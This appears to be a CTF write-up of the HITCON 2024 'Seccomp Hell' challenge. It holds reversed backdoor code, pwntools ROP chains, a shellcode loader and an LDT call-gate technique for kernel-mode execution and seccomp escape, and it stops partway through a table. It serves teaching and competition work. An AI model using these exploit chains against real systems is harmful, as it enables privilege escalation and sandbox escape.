HITCON CTF 2024 Quals - Seccomp Hell

Tue 16 July 2024 • 0x6fe1be2, cluosh • writeup

Seccomp Hell: userland, kernel and sandbox pwn

Seccomp Hell

Some challenges are userland pwns, others are kernel pwn, still others are sandbox escapes. In Seccomp Hell, you can get all three for free <3

Note: Try getting a full root shell for this challenge

Dist

TL;DR

You need to exploit three parts in this challenge:

userland exploitation
a backdoor that allows a ROP chain, which can be used to get arbitrary code execution
kernel backdoor
a backdoor that creates a call gate in the LDT (Local Descriptor Table), which gives us kernel-mode (ring 0) execution to run kernel shellcode
sandbox escape
disable seccomp and escalate privileges through kernel shellcode (corrupting the current task_struct)

Overview

Judging from the challenge description, there will be at least three parts: 1. userland exploitation, 2. kernel exploitation, 3. sandbox escape (seccomp).

The challenge consists of only three files:

dist
├── bzImage
├── initramfs.cpio.gz
└── run.sh

A simple run.sh script:

#!/bin/bash

qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
    -monitor /dev/null \
    -nographic \
    -netdev user,id=net0,hostfwd=tcp::22222-:22222 \
    -device e1000,netdev=net0 \
    -no-reboot

One important aspect is that +smep (Supervisor Mode Execution Prevention) is missing ... foreshadowing

Here is also an explanation of the kernel parameters:

console=ttyS0
kernel console on the serial port; nothing interesting, but use context.newline = b'\r\n' in pwntools
loglevel=3
reduces the amount of logging; can be increased or removed for easier debugging
oops=panic
immediately panic on every kernel oops, which means our kernel exploit needs to be precise
panic=-1
immediately reboot on kernel panic (qemu exits because of -no-reboot), so we can't just retry the corruption in another socket connection (not that we necessarily wanted to)
pti=on
enable (Kernel) Page Table Isolation, so no CPU side channels like Meltdown

We can decompress the initramfs.cpio.gz file using something similar to this script.
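The linked script is not reproduced here. As a rough stand-in, this is a minimal Python sketch that only lists the entries of a gzipped initramfs, assuming the "newc" (070701) cpio format used by Linux initramfs images. It does not recreate directories, symlinks or device nodes; for actual extraction, `gunzip -c initramfs.cpio.gz | cpio -idm` does the job. The function names are hypothetical.

```python
import gzip


def parse_newc(data: bytes):
    """Yield (name, mode, body) for every entry of a 'newc' cpio archive."""
    off = 0
    while True:
        hdr = data[off:off + 110]
        if hdr[:6] not in (b"070701", b"070702"):
            raise ValueError(f"bad cpio magic at offset {off:#x}")
        # 13 fields of 8 ASCII hex digits follow the 6-byte magic
        fields = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = off + 110
        name = data[name_start:name_start + namesize - 1].decode()  # drop the NUL
        # header+name and the file data are each padded to a 4-byte boundary
        body_start = (name_start + namesize + 3) & ~3
        body = data[body_start:body_start + filesize]
        off = (body_start + filesize + 3) & ~3
        if name == "TRAILER!!!":
            return
        yield name, mode, body


def list_initramfs(path: str) -> None:
    """Print mode, size and name of each entry, similar to `cpio -tv`."""
    with gzip.open(path, "rb") as f:
        for name, mode, body in parse_newc(f.read()):
            print(f"{mode:06o} {len(body):8d} {name}")
```

Usage: `list_initramfs("dist/initramfs.cpio.gz")` should show entries such as `init` and `home/user/i_am_not_backdoor.bin`.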

Let's first look at the init script:

/init

#!/bin/sh

chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f

OK, so we know that the vulnerable userland binary is /home/user/i_am_not_backdoor.bin and the vulnerable kernel module is /usr/lib/modules/i_am_definitely_not_backdoor.ko, accessible through /dev/i_am_definitely_not_backdoor.

Test Environment

I used two of my tools to set up my test environment: vagd to exploit the userland binary, and how2keap as a template for the kernel exploitation part.

This is what my setup looks like:

seccomp_hell
├── Makefile
├── bins
│   ├── i_am_definitely_not_backdoor.ko
│   └── i_am_not_backdoor.bin
├── exploit.py
├── libs
│   ├── pwn.h
│   ├── util.c
│   └── util.h
├── pwn.c
├── rootfs
│   ├── ...
├── scripts
│   ├── build.sh
│   ├── compress.sh
│   ├── decompress.sh
│   ├── gdbinit
│   └── start-qemu.sh
└── share
    ├── bzImage
    ├── flag.txt
    ├── initramfs.cpio.gz
    ├── rootfs.cpio.gz -> initramfs.cpio.gz
    └── run.sh

Userland

Let's first get some basic information:

file:

bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped

checksec:

[*] './i_am_not_backdoor.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0

seccomp-tools dump:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000002a  if (A != connect) goto 0017
 0016: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0017: 0x15 0x00 0x01 0x0000009a  if (A != modify_ldt) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0021
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0021: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0023
 0022: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0023: 0x06 0x00 0x00 0x00000000  return KILL

Hmm, some interesting syscalls are allowed: mmap and mprotect, which are important for running an assembly payload, and open, which lets us open the vulnerable kernel module. Also, for some reason a syscall called modify_ldt is whitelisted ... foreshadowing.
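To make the dump concrete, here is a small Python model of the filter. It is an illustration, not the kernel's BPF interpreter: build_filter() rebuilds the same 24 instructions from the x86_64 syscall numbers shown in the dump, and run_filter() evaluates only the three classic BPF opcodes this filter uses. All names are my own.

```python
import struct

# Classic BPF opcodes used by the filter (values from <linux/filter.h>)
LD_W_ABS = 0x20    # BPF_LD | BPF_W | BPF_ABS
JEQ_K = 0x15       # BPF_JMP | BPF_JEQ | BPF_K
RET_K = 0x06       # BPF_RET | BPF_K
SECCOMP_RET_ALLOW = 0x7FFF0000
SECCOMP_RET_KILL = 0x00000000   # same value as SECCOMP_RET_KILL_THREAD

# x86_64 syscall numbers, in the order of the dump
WHITELIST = {"read": 0, "write": 1, "open": 2, "close": 3, "mmap": 9,
             "mprotect": 10, "socket": 41, "connect": 42, "modify_ldt": 154,
             "exit": 60, "exit_group": 231}


def build_filter():
    """Rebuild the backdoor's filter as (code, jt, jf, k) tuples."""
    prog = [(LD_W_ABS, 0, 0, 0)]              # A = seccomp_data.nr (offset 0)
    for nr in WHITELIST.values():
        prog.append((JEQ_K, 0, 1, nr))        # if (A != nr) skip the next insn
        prog.append((RET_K, 0, 0, SECCOMP_RET_ALLOW))
    prog.append((RET_K, 0, 0, SECCOMP_RET_KILL))
    return prog


def run_filter(prog, nr):
    """Evaluate the filter for a syscall number (only the opcodes above)."""
    pc, acc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        if code == LD_W_ABS:
            acc = nr                          # this filter only loads offset 0 (nr)
            pc += 1
        elif code == JEQ_K:
            pc += 1 + (jt if acc == k else jf)  # jumps are relative to the next insn
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")


def to_bytes(prog):
    """Serialize as struct sock_filter {u16 code; u8 jt; u8 jf; u32 k;}."""
    return b"".join(struct.pack("<HBBI", *insn) for insn in prog)
```

For example, `run_filter(build_filter(), 59)` (execve) falls through to the last instruction and returns the KILL action, while 154 (modify_ldt) returns SECCOMP_RET_ALLOW.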

Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return pointer and jumps to a backdoor function using ROP:

  CALL       LAB_004018d1
LAB_004018d1:
  ADD        qword ptr [RSP]=>local_1e0,offset backdoor
  PUSH       RBP
  MOV        RBP,RSP
  LEAVE
  RET

The reversed backdoor code:

#include <assert.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#define EXAMINE_SYSCALL \
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

#define KILL_PROCESS \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL)


void backdoor(void) {

  char rop[0];  // zero-sized stack buffer

  // stack buffer overflow: up to 0x98 bytes of ROP chain
  read(STDIN_FILENO, rop, 0x98);
  close(STDIN_FILENO);
  close(STDOUT_FILENO);
  close(STDERR_FILENO);

  struct sock_filter seccomp_filter[] = {
      EXAMINE_SYSCALL,
      ALLOW_SYSCALL(read),
      ALLOW_SYSCALL(write),
      ALLOW_SYSCALL(open),
      ALLOW_SYSCALL(close),
      ALLOW_SYSCALL(mmap),
      ALLOW_SYSCALL(mprotect),
      ALLOW_SYSCALL(socket),
      ALLOW_SYSCALL(connect),
      ALLOW_SYSCALL(modify_ldt), // foreshadowing
      ALLOW_SYSCALL(exit),
      ALLOW_SYSCALL(exit_group),
      KILL_PROCESS,
  };

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,
  };

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}

The backdoor can be summarized like this:

buffer overflow via read (our ROP chain)
close STDIN, STDOUT and STDERR
set up a seccomp filter whitelist

Let's take a look at the open files before they are closed:

ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------    1 user     users           64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 3 -> socket:[385]
lrwx------    1 user     users           64 Jul 12 17:12 4 -> socket:[386]
lrwx------    1 user     users           64 Jul 12 17:12 5 -> /dev/ttyS0

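Interesting: the standard fds simply point to /dev/pts/0, so what happens if we just open it again? ... We regain a working STDIN, because open returns the lowest free file descriptor, which is 0 after the three close calls.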
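The "lowest free fd" rule is easy to check on any Linux host. This sketch uses /dev/null as a stand-in for /dev/pts/0 and a hypothetical helper name: the first open after a close reuses the freed number. In the exploit, the same rule turns the first reopen into fd 0 (stdin) and a second reopen into fd 1 (stdout).

```python
import os


def reopen_lowest_fd(path: str = os.devnull) -> tuple:
    """Close an fd, open the file again and return (closed_fd, new_fd)."""
    fds = [os.open(path, os.O_RDWR) for _ in range(3)]
    victim = fds[0]            # every fd below it is still in use
    os.close(victim)
    reused = os.open(path, os.O_RDWR)   # POSIX: lowest available descriptor
    for fd in (reused, *fds[1:]):
        os.close(fd)
    return victim, reused
```

`reopen_lowest_fd()` returns two equal numbers, just like reopening /dev/pts/0 after `close(STDIN_FILENO)` yields fd 0 again.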

Note: the /dev/pts/0 number increments if there are multiple consecutive connections; this was briefly a problem while the instance spawner was temporarily replaced with a shared instance.

Note: this approach was unintended; the intended solution opens a socket connection using the allowed socket and connect syscalls.

So let's write a simple payload that reopens /dev/pts/0, reads a new ROP payload into a known memory address and pivots there.

Stage 1:

linfo("STAGE 1: ROP")

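# reopening this pty gives us back a working stdin
std = b'/dev/pts/0\0'

uname = std

passwd = b''

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

# skip the first two `syscall ; ret` matches and use the third one
sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

# known writable address in the non-PIE binary
PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp: the final `leave ; ret` pivots the stack to PIVOT+0x100
# rdi = rbx - 0x258 (presumably the stack address of uname, i.e. '/dev/pts/0')
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2) # filler for pop rbx
rop.rdi = 0x258
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
# open('/dev/pts/0', O_RDWR) -> fd 0, the lowest free fd
rop.rax = cst.SYS_open
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

# read(0, PIVOT, rdx): rax == 0 is both the new fd and SYS_read
rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0) # used instead of rop.rdx (presumably sets rdx and keeps rax)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)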

Stage 2: pivot ROP

Now that we have more control over the ROP chain (it is no longer limited to 0x98 bytes), we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

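# reopen /dev/pts/0 (stored at PIVOT) -> fd 1, a working stdout
pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

# SYS_mprotect is 10 == b'\n', which can't be sent, so load 11 and decrement
pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))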
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

Stage 3: loader

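At this point we realized that certain characters, e.g. \n and \x04 (End of Transmission), can't be sent, because the pty's line discipline treats them specially (\n ends the current read, \x04 is the EOF character). That's why we added another loader stage that decodes the payload and writes it into executable memory.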
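A quick way to spot such bytes is to scan every chunk before sending it. This sketch (hypothetical helper name; the instruction encodings are hand-assembled from the Intel opcode tables, so double-check them with pwntools' asm()) shows two places where they matter: SYS_mprotect itself is 10 == '\n', which is why stage 2 loads SYS_mprotect + 1 and decrements, and a shift by 4 encodes an 0x04 immediate, whereas a shift by 2 does not.

```python
import struct

# bytes that don't survive the pty: '\n' ends the current read, 0x04 is EOT (^D)
BAD = (0x0A, 0x04)


def bad_offsets(data: bytes) -> list:
    """Return the offsets of bytes that can't be sent through the pty."""
    return [i for i, b in enumerate(data) if b in BAD]


# hand-assembled encodings
SHL_AL_4 = bytes.fromhex("c0e004")     # shl al, 4
SHL_AL_2 = bytes.fromhex("c0e002")     # shl al, 2
SHR_RAX_4 = bytes.fromhex("48c1e804")  # shr rax, 4
SHR_RAX_2 = bytes.fromhex("48c1e802")  # shr rax, 2

SYS_MPROTECT = 10  # x86_64

if __name__ == "__main__":
    print(bad_offsets(struct.pack("<Q", SYS_MPROTECT)))      # [0]
    print(bad_offsets(struct.pack("<Q", SYS_MPROTECT + 1)))  # []
    print(bad_offsets(SHL_AL_4), bad_offsets(SHL_AL_2))      # [2] []
```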

payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
LOAD:
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
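  pop rax
  // al = low-nibble char, ah = high-nibble char
  sub ah, 0x41
  sub al, 0x41
  // shift by 2 twice: shifting by 4 directly would encode an 0x04 byte
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2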
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x20}
  jmp rax

FAIL:
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3
"""))

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex digits starting at 'A' (0x0 -> 'A', ..., 0xf -> 'P')
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))


linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

it()
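To convince ourselves that the encoder and the loader agree, this sketch re-implements the encoding and replays the loader's register arithmetic (pop rax, two subtractions, the split shifts, then storing al) in Python. The function names are my own; the register steps mirror the loader above.

```python
def encode(payload: bytes) -> bytes:
    """Each byte becomes two chars in 'A'..'P', least significant nibble first."""
    out = bytearray()
    for b in payload:
        out += bytes(((b & 0xF) + 0x41, (b >> 4) + 0x41))
    return bytes(out)


def loader_decode_pair(first: int, second: int) -> int:
    """Replay the loader's register arithmetic for one 2-byte chunk."""
    al, ah = first, second            # after `pop rax`: al = 1st char, ah = 2nd char
    ah = (ah - 0x41) & 0xFF           # sub ah, 0x41
    al = (al - 0x41) & 0xFF           # sub al, 0x41
    al = (al << 4) & 0xFF             # shl al, 2 ; shl al, 2
    rax = ((ah << 8) | al) >> 4       # shr rax, 2 ; shr rax, 2
    return rax & 0xFF                 # mov BYTE PTR [rbx+PAYLOAD], al


def decode(enc: bytes) -> bytes:
    return bytes(loader_decode_pair(enc[i], enc[i + 1]) for i in range(0, len(enc), 2))


if __name__ == "__main__":
    print(encode(b"\xcc"))  # b'MM' (int 3)
```

Since every encoded character lies in 'A'..'P' (0x41..0x50), neither \n nor \x04 can ever appear in the transmitted payload.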

This basically finishes the userland exploitation stage

Kernel

Let's get into the interesting part: the kernel. Let's reverse the backdoor.

Simplified reversed backdoor:

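#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/vmalloc.h>

static int backdoor_open(struct inode *inode, struct file *file) { return 0; }
static int backdoor_release(struct inode *inode, struct file *file) { return 0; }
static ssize_t backdoor_read(struct file *file, char __user *buf, size_t len, loff_t *off) { return 0; }


static ssize_t backdoor_write(struct file *file, const char __user *buf, size_t len, loff_t *off) {
  pte_t *pte;
  spinlock_t *ptl;
  struct page *page;
  u8 *ldt;

  // check if the LDT is mapped at 0xffff880000010000 (it flip-flops between two addresses);
  // the first argument decompiles to const_pcpu_hot + 0x8f8, presumably current->mm
  if (follow_pte(current->mm, 0xffff880000010000, &pte, &ptl) != 0)
    return -EFAULT;
  page = pte_page(*pte);
  pte_unmap_unlock(pte, ptl);  // follow_pte returns with the page table lock held

  // map the LDT page writable: vmap(pages, 1, VM_MAP (4), PAGE_KERNEL (0x8000000000000163))
  ldt = vmap(&page, 1, VM_MAP, PAGE_KERNEL);
  if (ldt == NULL)
    return -EFAULT;

  // corrupt LDT entry 12 (offset 0x60)
  ldt[0x60] = 0;     // limit0 = 0
  ldt[0x61] = 0;

  ldt[0x65] = 0xec;  // P=1, DPL=3, S=0, type=0xc: call gate
  ldt[0x66] = 0xc0;  // G=1, D=1, limit1=0
  ldt[0x67] = 0;     // base2 = 0

  vunmap(ldt);

  return 0;
}

static const struct file_operations backdoor_fops = {
    .owner = THIS_MODULE,
    .open = backdoor_open,
    .release = backdoor_release,
    .read = backdoor_read,
    .write = backdoor_write,
};

static struct miscdevice backdoor_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "i_am_definitely_not_backdoor",
    .fops = &backdoor_fops,
};

static int __init backdoor_init(void) {
  return misc_register(&backdoor_device);
}

static void __exit backdoor_exit(void) {
  misc_deregister(&backdoor_device);
}

module_init(backdoor_init);
module_exit(backdoor_exit);
MODULE_LICENSE("GPL");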

So this basically checks whether a page is mapped at 0xffff880000010000 and, if so, overwrites something at offset 0x60. Writing to the device right away fails with -EFAULT, so how do we get something allocated in this page? This is where the foreshadowing comes into play: the mysterious modify_ldt syscall actually allocates exactly this page.

Note: modify_ldt actually flip-flops the LDT mapping between two addresses (0xffff880000000000 and 0xffff880000010000) on every call, so we need to call modify_ldt twice for the LDT to end up at the address the backdoor checks.
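The flip-flop can be modelled in a few lines. This is a sketch under the assumption stated in the note (as far as I can tell from the kernel source, the first LDT goes into slot 0 and each new LDT takes the slot the old one did not use); the constants are the ones from the PoC further below, the function names are hypothetical.

```python
LDT_BASE_ADDR = 0xFFFF880000000000   # LDT remap area with 4-level paging (PoC constant)
LDT_STRIDE = 0x10000                 # distance between the two slots (PoC constant)
BACKDOOR_CHECK = 0xFFFF880000010000  # address the module passes to follow_pte


def ldt_slots(n_calls: int) -> list:
    """Mapping address of the LDT after each modify_ldt(0x11, ...) call."""
    addrs, slot = [], None
    for _ in range(n_calls):
        slot = 0 if slot is None else 1 - slot   # alternate between slot 0 and 1
        addrs.append(LDT_BASE_ADDR + slot * LDT_STRIDE)
    return addrs


def entry_addr(ldt_addr: int, index: int) -> int:
    """Address of an 8-byte LDT entry."""
    return ldt_addr + index * 8
```

After two calls the LDT sits at BACKDOOR_CHECK, and `entry_addr(BACKDOOR_CHECK, 12) + 5` is the access byte the backdoor rewrites (0xffff880000010065, the same address the PoC's module_message contains).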

So what is the LDT and how does it work? The LDT (Local Descriptor Table) is similar to the GDT (Global Descriptor Table): it holds segment descriptors, which describe memory segments (base, limit and access rights like read, write and execute), but it can also hold system descriptors like call, trap and interrupt gates (e.g. an interrupt gate in the IDT is used for the legacy int 0x80 syscall). However, modify_ldt can't create system descriptors, because it always sets the S flag (a system descriptor needs S clear). Additional info can be found in the Intel bible (the Intel SDM).

So let's understand an LDT entry. Through modify_ldt we can set the following options:

include/uapi/asm/ldt.h

struct user_desc {
    unsigned int  entry_number;
    unsigned int  base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
#ifdef __x86_64__
    /*
     * Because this bit is not present in 32-bit user code, user
     * programs can pass uninitialized values here.  Therefore, in
     * any context in which a user_desc comes from a 32-bit program,
     * the kernel must act as though lm == 0, regardless of the
     * actual value.
     */
    unsigned int  lm:1;
#endif
};

These need to be translated into this struct:

include/asm/desc_defs.h:

struct desc_struct {
    u16 limit0;
    u16 base0;
    u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
    u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));

using this translation function:

include/asm/desc.h:

static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
{
    desc->limit0        = info->limit & 0x0ffff;

    desc->base0     = (info->base_addr & 0x0000ffff);
    desc->base1     = (info->base_addr & 0x00ff0000) >> 16;

    desc->type      = (info->read_exec_only ^ 1) << 1;
    desc->type         |= info->contents << 2;
    /* Set the ACCESS bit so it can be mapped RO */
    desc->type         |= 1;

    desc->s         = 1;
    desc->dpl       = 0x3;
    desc->p         = info->seg_not_present ^ 1;
    desc->limit1        = (info->limit & 0xf0000) >> 16;
    desc->avl       = info->useable;
    desc->d         = info->seg_32bit;
    desc->g         = info->limit_in_pages;

    desc->base2     = (info->base_addr & 0xff000000) >> 24;
    /*
     * Don't allow setting of the lm bit. It would confuse
     * user_64bit_mode and would get overridden by sysret anyway.
     */
    desc->l         = 0;
}

As mentioned, we can't create a system segment (S flag clear) ourselves. So let's create an entry at index 12 (offset 0x60 / 8 bytes per entry) and see what happens when we write to the backdoor.

example:

  struct user_desc ldt = {
      .entry_number = 12, // max 0x1ffe
      .base_addr = 0x8899aabb, // 32 bits
      .limit = 0xdeeff, // 20 bits
      .contents=0, // 2 bits
      .read_exec_only=0, // 1 bit
      .seg_not_present=0, // 1 bit
      .useable=0, // 1 bit
      .seg_32bit=0, // 1 bit
      .limit_in_pages=0, // 1 bit
  };

  SYSCHK(syscallt(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));

before corrupt:

0xffff880000010060:     0x880df399aabbeeff
0xffff880000010060:     0xeeff  0xaabb  0xf399  0x880d
0xffff880000010060:     0xff    0xee    0xbb    0xaa    0x99    0xf3    0x0d    0x88

desc_struct {
        .limit0        = 0xeeff   
        .limit1        = 0xd
        .base0         = 0xaabb 
        .base1         = 0x99
        .base2         = 0x88
        .type          = 0x3 (contents=0, ACCESS=1, read_exec_only=0)
        .s             = 1
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 0
        .g             = 0
}

after corrupt:

0xffff880000010060:     0x00c0ec99aabb0000
0xffff880000010060:     0x0000  0xaabb  0xec99  0x00c0
0xffff880000010060:     0x00    0x00    0xbb    0xaa    0x99    0xec    0xc0    0x00

desc_struct {
        .limit0        = 0x0   
        .limit1        = 0x0
        .base0         = 0xaabb 
        .base1         = 0x99
        .base2         = 0x00
        .type          = 0xc (contents=3, ACCESS=0, read_exec_only=1)
        .s             = 0
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 1
        .g             = 1
}
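Both dumps can be reproduced with a short Python port of fill_ldt plus the module's byte writes. This is a sketch for checking the field decoding by hand (function names are my own); it assumes the little-endian 8-byte desc_struct layout shown above.

```python
import struct


def fill_ldt(base_addr, limit, seg_32bit=0, contents=0, read_exec_only=0,
             limit_in_pages=0, seg_not_present=0, useable=0) -> bytes:
    """Python port of the kernel's fill_ldt(): user_desc fields -> desc_struct."""
    type_ = ((read_exec_only ^ 1) << 1) | (contents << 2) | 1  # ACCESS bit set
    s, dpl, p = 1, 3, seg_not_present ^ 1                    # always S=1, DPL=3
    access = type_ | (s << 4) | (dpl << 5) | (p << 7)
    # l (bit 5) is always 0
    flags = ((limit >> 16) & 0xF) | (useable << 4) | (seg_32bit << 6) | (limit_in_pages << 7)
    return struct.pack("<HHBBBB", limit & 0xFFFF, base_addr & 0xFFFF,
                       (base_addr >> 16) & 0xFF, access, flags, (base_addr >> 24) & 0xFF)


def backdoor_corrupt(desc: bytes) -> bytes:
    """Apply the module's writes to offsets 0x60, 0x61, 0x65-0x67 of entry 12."""
    d = bytearray(desc)
    d[0] = d[1] = 0   # limit0 = 0
    d[5] = 0xEC       # P=1, DPL=3, S=0, type=0xc
    d[6] = 0xC0       # G=1, D=1, L=0, AVL=0, limit1=0
    d[7] = 0          # base2 = 0
    return bytes(d)


def decode_desc(desc: bytes) -> dict:
    limit0, base0, base1, access, flags, base2 = struct.unpack("<HHBBBB", desc)
    return {"limit0": limit0, "limit1": flags & 0xF, "base0": base0,
            "base1": base1, "base2": base2, "type": access & 0xF,
            "s": (access >> 4) & 1, "dpl": (access >> 5) & 3, "p": access >> 7,
            "avl": (flags >> 4) & 1, "l": (flags >> 5) & 1,
            "d": (flags >> 6) & 1, "g": flags >> 7}
```

`fill_ldt(0x8899aabb, 0xdeeff)` packs to 0x880df399aabbeeff, and `backdoor_corrupt` turns it into 0x00c0ec99aabb0000, matching the two dumps.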

So it looks like the backdoor actually turns our entry into a system descriptor (S=0, type=0xc). Let's look at the table to understand which system descriptor type we have:

System-Segment and Gate-Descriptor Types:

Type  Bits 11-8  32-Bit Mode             IA-32e Mode
0x0   0 0 0 0    Reserved                Upper 8 bytes of a 16-byte descriptor
0x1   0 0 0 1    16-bit TSS (Available)  Reserved
0x2   0 0 1 0    LDT                     LDT
